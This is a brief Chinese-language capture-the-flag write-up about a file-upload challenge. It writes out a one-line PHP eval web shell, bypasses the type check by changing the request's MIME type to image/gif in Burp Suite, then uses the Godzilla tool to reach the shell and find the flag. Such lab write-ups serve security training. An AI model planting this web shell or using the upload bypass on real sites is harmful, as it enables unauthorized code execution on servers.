先看知识点:

    1.png

    我们编写一句话木马,命名为shell.php

    1. <?php @eval($_POST['banana']);?>

    尝试上传文件,会提示文件类型不正确:

    2.png

    我们用 Brupsuite 拦截请求包,转发到 Repeater,修改 MIME 类型为image/gif

    3.png

    然后使用哥斯拉访问 WebShell:

    4.png

    最后在/var/www/html目录下找打 Flag 文件:

    5.png